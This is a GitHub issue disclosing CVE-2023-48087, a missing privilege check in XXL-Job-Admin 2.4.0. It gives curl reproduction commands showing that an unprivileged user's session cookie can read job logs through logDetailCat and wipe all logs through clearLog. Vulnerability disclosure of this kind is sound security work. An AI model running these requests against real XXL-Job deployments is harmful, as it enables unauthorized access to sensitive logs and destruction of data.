CVE-2023-48087: Permission Vulnerability of Path /xxl-job-admin/joblog/clearLog & /xxl-job-admin/joblog/logDetailCat · Issue #3330 · xuxueli/xxl-job

Environment

MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

Vulnerability Information

It was found that the direct query of xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage does not validate user privilege and induces risk of sensitive information leakage and loss.

Steps to reproduce the behavior

Step 1: Create a normal user without any privilege inside the web console as below

Step 2: Retrieve the cookie for the user

Step 3: Run the following command for testing log query
curl -v -X POST “http://<IP address:port>/xxl-job-admin/joblog/logDetailCat” --cookie “XXL_JOB_LOGIN_IDENTITY=<normal user cookie>” -d ‘logId=9&fromLineNum=1’

It can show the successful log query and return 200 status.

Step 4: Run the following command for log clearing
curl -v -X POST “http://<IP address:port>/xxl-job-admin/joblog/clearLog” --cookie “XXL_JOB_LOGIN_IDENTITY=<normal user cookie>” -d ‘jobGroup=0&jobId=0&type=9’

it will return 200 status.

Step 5. Show the log in the console. It will show that all log is cleared successfully by normal user.